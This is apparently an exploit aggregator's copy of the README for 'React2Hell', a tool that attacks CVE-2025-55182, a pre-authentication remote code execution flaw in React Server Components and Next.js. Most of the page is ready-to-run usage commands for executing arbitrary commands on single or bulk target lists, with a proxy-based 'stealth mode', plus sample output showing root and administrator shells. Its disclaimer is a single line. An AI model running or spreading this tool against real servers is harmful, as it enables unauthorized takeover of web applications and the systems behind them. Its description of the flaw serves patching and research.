Share
## https://sploitus.com/exploit?id=B00FDC85-D341-5A42-BC6C-714D9F5096AA
# ๐งจ **React2Hell โ CVE-2025-55182 Exploit**
๐ฅ *Next.js / React Server Remote Code Execution (RCE) Exploit*
```
โโโโโโ โโโโโ โโโ โโโโ โโโโโโ โโโโโ โโ โโ โโโโโ โโ โโ
โโโโโโโ โโโโ โโโโโ โโโโโ โโ โโโโ โโโโโโ โโโโ โโ โโ
โโ โโ โโโโโ โโโโโ โโโโโ โโ โโโโโ โโ โโ โโโโโ โโโโโ โโโโโ
Next.js/React Server RCE Exploit โ CVE-2025-55182
Author: Chetanya Sharma (AggressiveUser)
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
usage: new.py [-h] [-u URL] [-l LIST] -c COMMAND [--proxy PROXY] [--proxy-https PROXY_HTTPS]
```
---
## ๐ Overview
**React2Hell** is a powerful exploitation tool designed to test and exploit **CVE-2025-55182**, a critical Remote Code Execution vulnerability affecting **Next.js** & **React Server Actions**.
A pre-authentication remote code execution vulnerability exists in React Server Components versions 19.0.0, 19.1.0, 19.1.1, and 19.2.0 including the following packages: react-server-dom-parcel, react-server-dom-turbopack, and react-server-dom-webpack. The vulnerable code unsafely deserializes payloads from HTTP requests to Server Function endpoints.
---
## โจ Features
* ๐งจ **Remote Code Execution (RCE)**
* ๐ **Single URL / Bulk URL scanning**
* ๐งฉ **Custom command execution**
* ๐ต๏ธโโ๏ธ **Stealth mode with proxy support**
* โก Fast, reliable, and easy to use
---
## ๐ Usage
### **Single Target Mode**
```
python exploit.py -u https://target.com -c "whoami"
```
### **Multiple Targets (from file)**
```
python exploit.py -l urls.txt -c "whoami"
```
### **With HTTP Proxy (Burp Suite)**
```
python exploit.py -u https://target.com -c "whoami" --proxy 127.0.0.1:8080
```
### **With HTTPS Proxy**
```
python exploit.py -u https://target.com -c "whoami" --proxy-https 127.0.0.1:8080
```
---
## ๐ urls.txt Example
```
http://site1.com
https://site2.com
http://192.168.1.10:3000
```
---
## ๐ฅ๏ธ Sample Output
```
PS D:\AggressiveUser_PVT\React2Hell> python.exe .\exploit.py -l .\list.txt -c whoami
โโโโโโ โโโโโ โโโ โโโโ โโโโโโ โโโโโ โโ โโ โโโโโ โโ โโ
โโโโโโโ โโโโ โโโโโ โโโโโ โโ โโโโ โโโโโโ โโโโ โโ โโ
โโ โโ โโโโโ โโโโโ โโโโโ โโ โโโโโ โโ โโ โโโโโ โโโโโ โโโโโ
Next.js/React Server RCE Exploit โ CVE-2025-55182
Author: Chetanya Sharma (AggressiveUser)
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
[+] Loaded 3 targets
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
[โ] Target: http://meow.host:3113/
[โ] Exec: whoami
[โ] VULNERABLE โ RCE Successful!
------------------------------------------------------------
root
------------------------------------------------------------
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
[โ] Target: http://evil.lab:2000/
[โ] Exec: whoami
[โ] Not vulnerable โ Status: 200
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
[โ] Target: https://vul.lab:3000/
[โ] Exec: whoami
[โ] VULNERABLE โ RCE Successful!
------------------------------------------------------------
win-1fl835ovldc\\administrator
------------------------------------------------------------
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
[โ] Scan complete โ Vulnerable: 2
PS D:\AggressiveUser_PVT\React2Hell>
```
---
## โ ๏ธ Disclaimer
> **This tool is created strictly for educational & security research purposes.
> Do NOT use it on systems without explicit authorization.
> You are responsible for your own actions.**
---
## โญ Support the Project
If this exploit helped you, consider leaving a โญ on GitHub โค๏ธ
---
## ๐ค Author
**Chetanya Sharma AggressiveUser**
Made with ๐ฅ by someone who enjoys breaking & fixing things.
---